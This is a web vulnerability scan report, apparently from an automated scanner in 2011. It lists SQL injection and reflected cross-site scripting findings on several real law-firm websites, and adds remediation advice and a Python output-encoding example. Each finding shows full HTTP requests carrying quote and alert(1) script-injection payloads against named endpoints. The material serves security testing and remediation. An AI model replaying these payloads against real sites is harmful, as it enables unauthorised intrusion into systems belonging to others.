The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.ebglaw.com/showoffice.aspx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 25

500 Internal Server Error

Request 2

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jan 2011 15:48:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...

1.2. http://www.fulbright.com/index.cfm [FUSEACTION parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.3. http://www.fulbright.com/index.cfm [article_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 12: Incorrect syntax near ''.
</font>
...[SNIP]...

1.4. http://www.fulbright.com/index.cfm [emp_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 60: Incorrect syntax near ''.
</font>
...[SNIP]...

1.5. http://www.fulbright.com/index.cfm [eventID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:51:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 4: Incorrect syntax near ''.
</font>
...[SNIP]...

1.6. http://www.fulbright.com/index.cfm [fuseaction parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=home.285' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.7. http://www.fulbright.com/index.cfm [site_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 9: Incorrect syntax near ''.
</font>
...[SNIP]...

2. Cross-site scripting (reflected)
There are 259 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
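
The two output contexts the findings in this section reflect into, a double-quoted HTML attribute value and a single-quoted JavaScript string, rendered both the way the scanned pages do it and the way the remediation requires. This is an added example, not code from the report or from any of the sites; the payloads are the ones recorded in findings 2.1, 2.6 and 2.7, while the function names and the backslash-escaping variant are assumptions modelled on what 2.7 shows.

```python
"""Added example, not code from the scanned sites: output encoding per context,
with a parser-based check for whether an injected <script> tag survives."""
import html
import re
from html.parser import HTMLParser

ATTR_PAYLOAD = '32e6e"><script>alert(1)</script>277857ca11c'   # finding 2.6
JS_PAYLOAD = "fbc5a'-alert(1)-'5b7885e79b2"                     # finding 2.1


def hidden_input_raw(name, value):
    """As in 2.6: request data copied straight into a double-quoted attribute."""
    return '<input type="hidden" name="%s" value="%s" />' % (name, value)


def hidden_input_backslash(name, value):
    """As in 2.7: a backslash is placed before each double quote.  That is a
    JavaScript-style escape; inside an HTML attribute the quote still ends
    the value, so the injected tag is parsed as markup anyway."""
    return hidden_input_raw(name, value.replace('"', '\\"'))


def hidden_input_encoded(name, value):
    """Fixed: entity-encode for the attribute context; quote=True covers the
    double quote as well as < > &."""
    return hidden_input_raw(html.escape(name, quote=True),
                            html.escape(value, quote=True))


def js_string_escape(s):
    """Encode for a quoted JavaScript string literal: every character outside
    [A-Za-z0-9] is replaced by its hexadecimal JS escape (e.g. ' -> \x27,
    < -> \x3c), so neither the literal nor the enclosing <script> block can
    be terminated by the data."""
    def esc(m):
        code = ord(m.group(0))
        return "\\x%02x" % code if code < 256 else "\\u%04x" % code
    return re.sub(r"[^A-Za-z0-9]", esc, s)


def form_action_raw(query):
    """As in 2.1 / 2.9: the request query copied into a single-quoted JS string."""
    return "myForm.action='/Home.aspx?%s';" % query


def form_action_encoded(query):
    """Fixed: JS-string encode before the value enters the script context."""
    return "myForm.action='/Home.aspx?%s';" % js_string_escape(query)


class _ScriptCounter(HTMLParser):
    """Check: count the <script> start tags an HTML parser actually sees."""
    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_tags(markup):
    parser = _ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


if __name__ == "__main__":
    for label, markup in (("raw", hidden_input_raw(ATTR_PAYLOAD, "1")),
                          ("backslash", hidden_input_backslash("u", ATTR_PAYLOAD)),
                          ("encoded", hidden_input_encoded(ATTR_PAYLOAD, "1"))):
        print("%-9s script tags seen by parser: %d" % (label, script_tags(markup)))
    print(form_action_raw(JS_PAYLOAD + "=1"))
    print(form_action_encoded(JS_PAYLOAD + "=1"))
```

The parser check is the point of the example: the raw and the backslash-escaped renderings both yield one `script` start tag, because an HTML attribute value ends at the next double quote regardless of any preceding backslash, while the entity-encoded rendering yields none. For the script context, entity encoding would be the wrong tool in turn (a browser does not decode entities inside a `<script>` block), which is why the JS-string encoder replaces every non-alphanumeric character rather than only the quote.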


2.1. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1
Host: jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:23:59 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2zpeeq45alawxszruhbhql55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9991
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?fbc5a'-alert(1)-'5b7885e79b2=1';//]]>
...[SNIP]...

2.2. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /fca/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882218266; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=f642355c896d83fe703b92dbf7d4cbd0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26018


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - False Claims Act Defense</title>

<link href="scripts/skadden_mini.css" rel="stylesheet
...[SNIP]...
<a href="/fca/index.php?6f2fa"><script>alert(1)</script>7a7277b34d3=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

2.3. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /hc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460887085136; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENHC=81465b85641fb95bc04d846351eba1e0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40019


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - Health Care</title>

<link href="scripts/skadden_mini.css" rel="stylesheet" type="text/
...[SNIP]...
<a href="/hc/index.php?b6d57"><script>alert(1)</script>5968cea9b03=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

2.4. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:43 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460883243148; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=93a86fa73ffca397505be2273bb8a129; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<iframe src="/sec/index.php?81116"><script>alert(1)</script>ab7d185670b=1&attorneys=1&inline=1" frameborder="0" scrolling="auto" name="primarycontact" allowtransparency="true" background-color="transparent">
...[SNIP]...

2.5. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882882759; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=31dc20249a9ecac44a1bd41ef91f6911; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<a href="/sec/index.php?7ae3b"><script>alert(1)</script>cc7c0c0318c=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

2.6. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="32e6e"><script>alert(1)</script>277857ca11c" value="1" />
...[SNIP]...

2.7. http://www.arnoldporter.com/practices.cfm [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response. The backslash inserted before the double quote is a JavaScript-style escape and has no meaning inside an HTML attribute value: the quote still terminates the attribute and the injected tag is parsed as markup, so this filtering does not prevent the attack.
